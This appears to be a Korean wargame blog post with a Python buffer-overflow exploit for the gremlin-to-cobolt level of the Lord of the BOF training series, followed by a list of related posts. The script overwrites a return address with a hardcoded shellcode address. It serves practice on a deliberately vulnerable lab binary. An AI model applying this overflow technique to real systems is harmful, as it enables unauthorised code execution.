exploit.py
import os
from struct import *
p = lambda x : pack("<L" , x)
path = '/home/gremlin/cobolt'
shellAddress = p(0xbffffc44)
payload = "A"*20+shellAddress
os.execl(path,path,payload)
'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글
[Remind] LOB goblin -> orc (0) | 2019.04.11 |
---|---|
[Remind] LOB cobolt -> goblin (0) | 2019.04.10 |
[Remind] LOB gate -> gremlin (0) | 2019.04.10 |
LOB nightmare -> xavius (0) | 2018.01.12 |
LOB succubus -> nightmare (0) | 2018.01.12 |